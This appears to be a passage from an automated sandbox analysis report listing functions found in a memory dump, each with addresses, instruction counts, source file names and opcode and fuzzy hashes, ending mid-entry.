                                                                                                                                          Function 00007FFD9BA86E21 Relevance: .2, Instructions: 224COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1732354126.00007FFD9BA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA80000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffd9ba80000_3e88PGFfkf.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 18114f54532032bf0e140b8fd6304d9a43d11ec7d81b24f111c8941b8644b91d
                                                                                                                                          • Instruction ID: 80b91755e696721d934309bc172f90cdf554126f4b4abf06528f78c2631f0e7c
                                                                                                                                          • Opcode Fuzzy Hash: 18114f54532032bf0e140b8fd6304d9a43d11ec7d81b24f111c8941b8644b91d
                                                                                                                                          • Instruction Fuzzy Hash: E681AC30A0AF4A8FE369DB58C5A4571B7E1FF04304B51457EC48A87EA2CAB9FD42CB40
                                                                                                                                          Function 00007FFD9BA838DB Relevance: .2, Instructions: 220COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1732354126.00007FFD9BA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA80000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffd9ba80000_3e88PGFfkf.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: fcaba6f41d56783302021b35015f17cdda5d185af0d0590ca8e056d137e2867a
                                                                                                                                          • Instruction ID: d3aca707522605432c1e2bd6fbab88dd8a7a974b2a7d4b668c0b7f8491f52f45
                                                                                                                                          • Opcode Fuzzy Hash: fcaba6f41d56783302021b35015f17cdda5d185af0d0590ca8e056d137e2867a
                                                                                                                                          • Instruction Fuzzy Hash: 2671C130E1E94E8EEB65DBA488756BCBBE0EF45300F5100BAE00ED75E6DE7969418741
                                                                                                                                          Function 00007FFD9BA8863D Relevance: .2, Instructions: 207COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1732354126.00007FFD9BA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA80000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffd9ba80000_3e88PGFfkf.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: b89b8e36d315b2f5316b748f0ca20cc14e6da92bb526e718a34366c55c2efb13
                                                                                                                                          • Instruction ID: 607a8c8161de20136bfe5287995357a497d3cac62e7ce1ff585cbc3385d97788
                                                                                                                                          • Opcode Fuzzy Hash: b89b8e36d315b2f5316b748f0ca20cc14e6da92bb526e718a34366c55c2efb13
                                                                                                                                          • Instruction Fuzzy Hash: 7751AF31A1EA4E4FD765EB68D8515E57790FF41320F0102FAD448CB1A6DEB8AA46C381
                                                                                                                                          Function 00007FFD9BA879D1 Relevance: .2, Instructions: 190COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1732354126.00007FFD9BA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA80000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffd9ba80000_3e88PGFfkf.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 2cfe889235151f87c9548611d717218a59d555c301bbdc16c69673c9687f621f
                                                                                                                                          • Instruction ID: ecc79b6b407b17e3ec21dcf7d33b47d557468e0c94034d81636ab3a2fed51c67
                                                                                                                                          • Opcode Fuzzy Hash: 2cfe889235151f87c9548611d717218a59d555c301bbdc16c69673c9687f621f
                                                                                                                                          • Instruction Fuzzy Hash: 23515B30E0995D8FDB94EFA8D865AEDBBF1FF59300F11016AD00DE7695CA74A981CB40
                                                                                                                                          Function 00007FFD9BA8896D Relevance: .2, Instructions: 161COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1732354126.00007FFD9BA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA80000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffd9ba80000_3e88PGFfkf.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 0c0202f947b5863fc52c3fd14c87203847fbade5c3afc010680762a5db2e365b
                                                                                                                                          • Instruction ID: 4c99e0ae76b38fa90a04ddbe55396816a391d4236b09e45aef59a59745f41546
                                                                                                                                          • Opcode Fuzzy Hash: 0c0202f947b5863fc52c3fd14c87203847fbade5c3afc010680762a5db2e365b
                                                                                                                                          • Instruction Fuzzy Hash: 0C51D070E0961E8FDB64EFA8C861AFDBBB0FF45300F0101B9D009972E6DA786945CB81
                                                                                                                                          Function 00007FFD9BA8C220 Relevance: .1, Instructions: 129COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1732354126.00007FFD9BA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA80000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffd9ba80000_3e88PGFfkf.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 0f09bef26056e9ab3b9b27b835ccc95845106e2f1161e4e0095fd26cbcb907bb
                                                                                                                                          • Instruction ID: eb283d38b73d76f01172f8c232fc0b93614af4276eecf5baae28fb3eb5dd7787
                                                                                                                                          • Opcode Fuzzy Hash: 0f09bef26056e9ab3b9b27b835ccc95845106e2f1161e4e0095fd26cbcb907bb
                                                                                                                                          • Instruction Fuzzy Hash: 6641D630A1D95E4EEB78A79884617F877A1FF64300F1541BAC04ECB9D6ED7C7A819B40
                                                                                                                                          Function 00007FFD9BA87447 Relevance: .1, Instructions: 127COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1732354126.00007FFD9BA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA80000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffd9ba80000_3e88PGFfkf.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 843abdf2f3b54fba643e521a425f5bda82f43af970781824ba3eb579c5e25033
                                                                                                                                          • Instruction ID: 43e22e0ca5b0232f0f0290b45fc6e293bdf12d9ace76981ced6ac65102b6f8a4
                                                                                                                                          • Opcode Fuzzy Hash: 843abdf2f3b54fba643e521a425f5bda82f43af970781824ba3eb579c5e25033
                                                                                                                                          • Instruction Fuzzy Hash: BA41817170C9498FDB9DEB28C4A5EA473E1FBA8310B040169D44EC3692DE35EC42CB41
                                                                                                                                          Function 00007FFD9BA86170 Relevance: .1, Instructions: 127COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1732354126.00007FFD9BA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA80000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffd9ba80000_3e88PGFfkf.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: bd83804cf9f00b46dba0ef3af1906ab9a06f44b69aa1824659869c361342cad1
                                                                                                                                          • Instruction ID: fba4e25932a84f4a82a0371c234000ab6f009a72a9781b3e1a3e8f1d7694d387
                                                                                                                                          • Opcode Fuzzy Hash: bd83804cf9f00b46dba0ef3af1906ab9a06f44b69aa1824659869c361342cad1
                                                                                                                                          • Instruction Fuzzy Hash: F841E430E1D85E4EF7B8D75C8474AB8BBA1EF54300F1541FAC04ECB996ED786A818741
                                                                                                                                          Function 00007FFD9BA88F09 Relevance: .1, Instructions: 123COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1732354126.00007FFD9BA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA80000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffd9ba80000_3e88PGFfkf.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: bd0fa70eaf60df41da7db759cfc7b74c840ad22fe8127a51d7214aaaf098deb1
                                                                                                                                          • Instruction ID: f1969429d9a632645370ad416274204cd4005deaf58f8b3f9b7868e46b276ef8
                                                                                                                                          • Opcode Fuzzy Hash: bd0fa70eaf60df41da7db759cfc7b74c840ad22fe8127a51d7214aaaf098deb1
                                                                                                                                          • Instruction Fuzzy Hash: 4431F531A0F98E8BF73957D658391B83680EF81320F1621BED54E868F2DCAD36115352
                                                                                                                                          Function 00007FFD9BA8D4F7 Relevance: .1, Instructions: 123COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1732354126.00007FFD9BA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA80000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffd9ba80000_3e88PGFfkf.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 6f647240f88b64fb6d65a2b23a5a2a8076676ad44443090ec274dd39c6652c8d
                                                                                                                                          • Instruction ID: 8096d0f138375866b986c8fa2ecd265ae87434080b045c7ef19e7474db5e751b
                                                                                                                                          • Opcode Fuzzy Hash: 6f647240f88b64fb6d65a2b23a5a2a8076676ad44443090ec274dd39c6652c8d
                                                                                                                                          • Instruction Fuzzy Hash: B3415E31A0C9488FDF99EF18D4A5DA4B7E1FBA8314B1402AED04EC3696DE34F945CB81
                                                                                                                                          Function 00007FFD9BA81AE5 Relevance: .1, Instructions: 121COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1732354126.00007FFD9BA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA80000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffd9ba80000_3e88PGFfkf.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 61b130540ebaae4cdff950fa4caf28fa9c7640a261272a0c2f4e55774f87d0ce
                                                                                                                                          • Instruction ID: 1ea7e4aea065e4e85c60b3b7fbf85ff589b16aacf0b681bfb2765d188acb5a7e
                                                                                                                                          • Opcode Fuzzy Hash: 61b130540ebaae4cdff950fa4caf28fa9c7640a261272a0c2f4e55774f87d0ce
                                                                                                                                          • Instruction Fuzzy Hash: E9311C21F1D82B4AF739639C78748F8BB41DF90325B1441B7D04A8B9D7ECBC75828280
                                                                                                                                          Function 00007FFD9BA874F1 Relevance: .1, Instructions: 120COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1732354126.00007FFD9BA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA80000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffd9ba80000_3e88PGFfkf.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 2f35b262640c97801f4d8c4da1e4bf90eb12e03b3dc0cc2d9a9796eea3dd8af1
                                                                                                                                          • Instruction ID: 19c3f2d92e7ca40b21e14726e096adbf1deb4e7c549e828ba1e759ed787eb16e
                                                                                                                                          • Opcode Fuzzy Hash: 2f35b262640c97801f4d8c4da1e4bf90eb12e03b3dc0cc2d9a9796eea3dd8af1
                                                                                                                                          • Instruction Fuzzy Hash: 4F3190717089498FDB9DEB2CC4A5E64B3E1FBB931471402A9D45EC72A2DE34EC42CB81
                                                                                                                                          Function 00007FFD9BA8D5A1 Relevance: .1, Instructions: 118COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1732354126.00007FFD9BA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA80000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffd9ba80000_3e88PGFfkf.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 03a611abd5e0c51aa8579c25ce9174b39b9decb4e8e36e10cba424c1635a59de
                                                                                                                                          • Instruction ID: a720ac8d1c4d2fed9e6ad665c4b706edff800ef823f4ee5a06f759d84ba1cff0
                                                                                                                                          • Opcode Fuzzy Hash: 03a611abd5e0c51aa8579c25ce9174b39b9decb4e8e36e10cba424c1635a59de
                                                                                                                                          • Instruction Fuzzy Hash: 69314E31A089488FDB9DEF18C4A5D64B7E1FBA8314B1402AED45EC76A2DE34F945CB81
                                                                                                                                          Function 00007FFD9BA81AE8 Relevance: .1, Instructions: 116COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1732354126.00007FFD9BA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA80000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffd9ba80000_3e88PGFfkf.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 898755740046e85a4cd348141a62b679dbd79e168779747b9d2847cf71c39f0c
                                                                                                                                          • Instruction ID: 512d9447239e75e58a7458bc4f2a1d33534b7dcae10098152527f5ff55ddbed4
                                                                                                                                          • Opcode Fuzzy Hash: 898755740046e85a4cd348141a62b679dbd79e168779747b9d2847cf71c39f0c
                                                                                                                                          • Instruction Fuzzy Hash: 0531F821F1D82B4AF739639C78748F8AB41DF60325B1941B6D05E8B9D7ECBC76829281
                                                                                                                                          Function 00007FFD9BA8748B Relevance: .1, Instructions: 115COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1732354126.00007FFD9BA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA80000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffd9ba80000_3e88PGFfkf.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 8b5d2c498551a24126a8cb7c31dc5e575b38d10eb4305ed83691cef2ccf61fa8
                                                                                                                                          • Instruction ID: 6fef8478a6c04e88e7e821c734c9a0712e36f333012ab234bd3495a713e90949
                                                                                                                                          • Opcode Fuzzy Hash: 8b5d2c498551a24126a8cb7c31dc5e575b38d10eb4305ed83691cef2ccf61fa8
                                                                                                                                          • Instruction Fuzzy Hash: ED3182717089498FDB9DEF28C4A5EA4B3E1FBB931471401A9D45EC76A2DE34EC42CB81
                                                                                                                                          Function 00007FFD9BA845BD Relevance: .1, Instructions: 113COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1732354126.00007FFD9BA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA80000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffd9ba80000_3e88PGFfkf.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 5440799dfd0285748846b9c4251419b7801f13f328c1b65a400bb0f09e7eeb94
                                                                                                                                          • Instruction ID: 86934815d77cfb181db57fb00d7e57938de8dc05cce6b1c9299e827fa36bf408
                                                                                                                                          • Opcode Fuzzy Hash: 5440799dfd0285748846b9c4251419b7801f13f328c1b65a400bb0f09e7eeb94
                                                                                                                                          • Instruction Fuzzy Hash: BF316131B0990A4BDB68DB9CD4615A8B7E1FF98750B11413DD04ED3AA6DF7479128B80
                                                                                                                                          Function 00007FFD9BA8D53B Relevance: .1, Instructions: 113COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1732354126.00007FFD9BA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA80000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffd9ba80000_3e88PGFfkf.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: fc94c3fdba25ea83c081d2c13d9935c150b8cb34200d12d37f29d42a9775ef49
                                                                                                                                          • Instruction ID: d84fb945a47438785f9c74cc390efa1bfe4ee53f0837e5324e3ee988176d6c52
                                                                                                                                          • Opcode Fuzzy Hash: fc94c3fdba25ea83c081d2c13d9935c150b8cb34200d12d37f29d42a9775ef49
                                                                                                                                          • Instruction Fuzzy Hash: 26313F31A089498FDF9DEF18C4A5DA4B7E1FBA8314B1402AED04EC7692DE34F945CB81
                                                                                                                                          Function 00007FFD9BA82C7D Relevance: .1, Instructions: 109COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1732354126.00007FFD9BA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA80000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffd9ba80000_3e88PGFfkf.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 10928e3b94ad43fa681254a22d7fcfc6e6dde13581cf3b28ee7c73905abaf789
                                                                                                                                          • Instruction ID: fa4e86ad2a16281297fd2bbdda11c5f56a7bcfa1fa55b06ccc5a0812116d5ca1
                                                                                                                                          • Opcode Fuzzy Hash: 10928e3b94ad43fa681254a22d7fcfc6e6dde13581cf3b28ee7c73905abaf789
                                                                                                                                          • Instruction Fuzzy Hash: CB413D71E19A0D8FDFA8DF98C460ABCBBB1FF58300F510179D00AD76A4DA74A945CB40
                                                                                                                                          Function 00007FFD9BA81B00 Relevance: .1, Instructions: 104COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1732354126.00007FFD9BA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA80000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffd9ba80000_3e88PGFfkf.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 10fd9434ddd48b9d9951826781b6550ae3cfb19e18eb7baceb1cf7e624a599af
                                                                                                                                          • Instruction ID: 1439df06b297e30d7f729438a4a8f7cd60cf0c8fabe14471cca0e8b4033ce244
                                                                                                                                          • Opcode Fuzzy Hash: 10fd9434ddd48b9d9951826781b6550ae3cfb19e18eb7baceb1cf7e624a599af
                                                                                                                                          • Instruction Fuzzy Hash: 86310820F1D86B4AF779539C64745F8BB41DF60315F1941B6D04B8B9D7ECBC76828281
                                                                                                                                          Function 00007FFD9BA82E29 Relevance: .1, Instructions: 102COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1732354126.00007FFD9BA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA80000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffd9ba80000_3e88PGFfkf.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 2a97c070a800c907f5e69735da479bf3d35b3c2730e98978be6a24e4c9524c41
                                                                                                                                          • Instruction ID: f53c68fce6db68d985f077288f97a75adbe9f4ae9213c57a6a02743ebf0ec0d9
                                                                                                                                          • Opcode Fuzzy Hash: 2a97c070a800c907f5e69735da479bf3d35b3c2730e98978be6a24e4c9524c41
                                                                                                                                          • Instruction Fuzzy Hash: BA310B31B0FA8E4BF735579498325B93AD0EF62320F1501BAF44E8B9E2E99835125352
                                                                                                                                          Function 00007FFD9BA8A67B Relevance: .1, Instructions: 102COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1732354126.00007FFD9BA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA80000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffd9ba80000_3e88PGFfkf.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 65126655c87d23f1513826d9c30789de0d93600391b85ec7445f591fc54d8a8a
                                                                                                                                          • Instruction ID: fc3044102e25cb935dbf91824bcdef41665f18966efe6d35095031f60a5834c6
                                                                                                                                          • Opcode Fuzzy Hash: 65126655c87d23f1513826d9c30789de0d93600391b85ec7445f591fc54d8a8a
                                                                                                                                          • Instruction Fuzzy Hash: 85316E71B09D0E8FDB64EB9CD4A19A8B3A1FF58710B154139D01EC3A96CF74BD528B80
                                                                                                                                          Function 00007FFD9BA81B08 Relevance: .1, Instructions: 99COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1732354126.00007FFD9BA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA80000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffd9ba80000_3e88PGFfkf.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: d77440609b5587cc4d49abdc0da89d26be30727e2063c86423af4f1f5f0d0996
                                                                                                                                          • Instruction ID: 9413ffbebc88a14e142469ef73aa4d36141f82b89727c435322ab905f3206c5b
                                                                                                                                          • Opcode Fuzzy Hash: d77440609b5587cc4d49abdc0da89d26be30727e2063c86423af4f1f5f0d0996
                                                                                                                                          • Instruction Fuzzy Hash: BA310620F1D86B4AF739539C64749F8BB41EF60315F1942B6D04B8B9EBECBC76818281
                                                                                                                                          Function 00007FFD9BA8467A Relevance: .1, Instructions: 99COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1732354126.00007FFD9BA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA80000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffd9ba80000_3e88PGFfkf.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 7261239883b3b2b8047524d6032208bc3e1c3d0645169f8bfa4ada3533e7bd1c
                                                                                                                                          • Instruction ID: 67a06601abfa5ac4a853bff99d3806b75e1456a5d3997507d19dbfaea9780b45
                                                                                                                                          • Opcode Fuzzy Hash: 7261239883b3b2b8047524d6032208bc3e1c3d0645169f8bfa4ada3533e7bd1c
                                                                                                                                          • Instruction Fuzzy Hash: 1331D331F0DE4A4FE768E7A898622A8B7D1FF44310F45017ED05DC7AE2EE7869024741
                                                                                                                                          Function 00007FFD9BA8A743 Relevance: .1, Instructions: 91COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1732354126.00007FFD9BA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA80000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffd9ba80000_3e88PGFfkf.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 362c46ae8cbcb15e6e08909c5125328b22828fb0e9dcce14d92f8c5ceb3906d2
                                                                                                                                          • Instruction ID: bf763b3e824f426c74554cea0d3f4054657b6cb8780a411b58440c2a13d9ed47
                                                                                                                                          • Opcode Fuzzy Hash: 362c46ae8cbcb15e6e08909c5125328b22828fb0e9dcce14d92f8c5ceb3906d2
                                                                                                                                          • Instruction Fuzzy Hash: A521D631F0DD4E4FEB68D7A898666E877E1FF44310F15017AD05DC3AA2DD6869424380
                                                                                                                                          Function 00007FFD9BA81A48 Relevance: .1, Instructions: 88COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1732354126.00007FFD9BA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA80000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffd9ba80000_3e88PGFfkf.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: a693196b03eaa9974f92b2be2afefd14050d0286c6047ea9e9775a18c02dae49
                                                                                                                                          • Instruction ID: a5cb417b151473cba7f0075e54396beb34e14fa2bdb400cc0e191c58d879fbe3
                                                                                                                                          • Opcode Fuzzy Hash: a693196b03eaa9974f92b2be2afefd14050d0286c6047ea9e9775a18c02dae49
                                                                                                                                          • Instruction Fuzzy Hash: 24312A70F19D0ECAEBB8DB9484615BD77B1FF54300F510176E41ED69A1EFB86E408A42
                                                                                                                                          Function 00007FFD9BA88DA5 Relevance: .1, Instructions: 88COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1732354126.00007FFD9BA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA80000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffd9ba80000_3e88PGFfkf.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: a81956534bda4aceb74abe113adf7aed369e7b776956288330c55ff1bb5dcb25
                                                                                                                                          • Instruction ID: 9719579b3886ae5f903ee612a5cf6349d651053b49d1f7408bce967e0698ac88
                                                                                                                                          • Opcode Fuzzy Hash: a81956534bda4aceb74abe113adf7aed369e7b776956288330c55ff1bb5dcb25
                                                                                                                                          • Instruction Fuzzy Hash: 8531BF30E5DA8D9FCB95DB94C8605ECBBB1FF58310F11007AE00AD7692DE38A902C750
                                                                                                                                          Function 00007FFD9BA86143 Relevance: .1, Instructions: 87COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1732354126.00007FFD9BA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA80000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffd9ba80000_3e88PGFfkf.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: cd498afd4c46ceaab2ef53eb9941f4aa4e4456c133fff020a34b6dd8412a7fe3
